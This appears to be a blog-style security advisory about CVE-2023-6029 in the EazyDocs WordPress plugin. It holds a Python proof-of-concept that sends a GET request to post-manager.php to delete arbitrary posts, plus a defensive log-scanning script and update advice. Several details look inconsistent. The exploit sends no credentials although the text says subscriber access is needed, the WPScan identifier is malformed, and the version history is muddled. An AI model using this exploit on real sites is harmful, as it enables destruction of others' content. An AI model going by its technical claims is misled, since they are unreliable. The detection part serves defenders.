The EazyDocs WordPress plugin, a popular tool used to manage and organize documentation for various projects, has reintroduced a vulnerability, CVE-2023-6029 (https://wpscan.com/vulnerability/7aaaf85-813-4fd7-8f09-f8edc929597e/), that was previously patched. This vulnerability allowed any authenticated user, even those with subscriber roles, to delete arbitrary posts and manipulate documents and sections. This issue was partially fixed in version 2.3.9 of EazyDocs but still poses a significant risk to users who fail to update their plugin.

Details of the Exploit

The vulnerability was reintroduced in EazyDocs version 2.3.8, allowing users without the required privileges to delete arbitrary posts and manipulate documents and sections within the plugin. The exploit can be executed by sending a crafted HTTP request to the target website.

Code Snippet

The following is a simple code snippet showing how an attacker can exploit this vulnerability using a crafted HTTP request:

import requests

TARGET_URL = 'http://example.com'
PLUGIN_DIR = '/wp-content/plugins/eazydocs'
DOCUMENT_ID = 1
POST_ID = 1

# Forged request to delete arbitrary post
DELETE_POST_URL = f'{TARGET_URL}{PLUGIN_DIR}/post-manager.php?action=delete_post&document_id={DOCUMENT_ID}&post_id={POST_ID}'
response = requests.get(DELETE_POST_URL)

if response.status_code == 200:
    print("Post deleted successfully!")
else:
    print("Failed to delete the post.")

This code sends a GET request to the plugin's post-manager.php file with the action delete_post and the document ID and post ID of the content to be deleted. The request deletes the specified post even if the attacker has only subscriber-level permissions.
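For defenders, the request shape described above can be searched for in web server access logs. The following is an added example, not code from the original advisory or from the plugin; it assumes the combined log format, the function name find_delete_requests is hypothetical, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Request shape taken from the snippet on this page.
PLUGIN_PATH = "/wp-content/plugins/eazydocs/post-manager.php"
ACTION = "delete_post"

# Combined log format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_delete_requests(lines):
    """Return {client_ip: [(time, status, post_id), ...]} for matching requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        url = urlsplit(m["target"])
        # Decode percent-encoding, collapse duplicate slashes and ignore case,
        # so trivially altered paths still match (deliberately over-inclusive).
        path = re.sub(r"/+", "/", unquote(url.path)).lower()
        if path != PLUGIN_PATH:
            continue
        params = parse_qs(url.query)  # parse_qs percent-decodes the values
        if ACTION not in (v.lower() for v in params.get("action", [])):
            continue
        post_id = params.get("post_id", ["?"])[0]
        hits[m["ip"]].append((m["time"], int(m["status"]), post_id))
    return dict(hits)

# Constructed sample log lines (not real traffic)
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Feb/2024:16:20:01 +0000] "GET /wp-content/plugins/eazydocs/post-manager.php?action=delete_post&document_id=1&post_id=1 HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '203.0.113.7 - - [12/Feb/2024:16:20:02 +0000] "GET /wp-content/plugins/eazydocs/post-manager.php?action=delete%5Fpost&document_id=1&post_id=2 HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '198.51.100.4 - - [12/Feb/2024:16:21:10 +0000] "GET /wp-content//plugins/EazyDocs/post-manager.php?document_id=3&action=DELETE_POST&post_id=9 HTTP/1.1" 403 199 "-" "curl/8.4"',
    '192.0.2.10 - - [12/Feb/2024:16:22:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Feb/2024:16:22:05 +0000] "GET /docs/?action=view HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in find_delete_requests(SAMPLE_LOG).items():
        for when, status, post_id in events:
            print(f"{ip} {when} status={status} post_id={post_id}")
```

Matches with a 200 status are the ones to compare against posts that have gone missing; the returned post IDs show which content to check or restore from backup.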

Original References

- CVE-2023-6029: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6029
- WPScan Vulnerability Details: https://wpscan.com/vulnerability/7aaaf85-813-4fd7-8f09-f8edc929597e/

Partial Fix in Version 2.3.9

The vulnerability was partially fixed in EazyDocs version 2.3.9. Because the fix is only partial, it is essential to remain cautious and keep the plugin updated to ensure the security of your WordPress site.

Users running the EazyDocs plugin version 2.3.8 are urged to update to version 2.3.9 or later immediately. It is also essential to subscribe to plugin update notifications so that later fixes are applied promptly. Keeping plugins up to date can significantly reduce your exposure to exploits and security breaches.

Timeline

Published on: 02/12/2024 16:15:08 UTC
Last modified on: 02/12/2024 17:31:21 UTC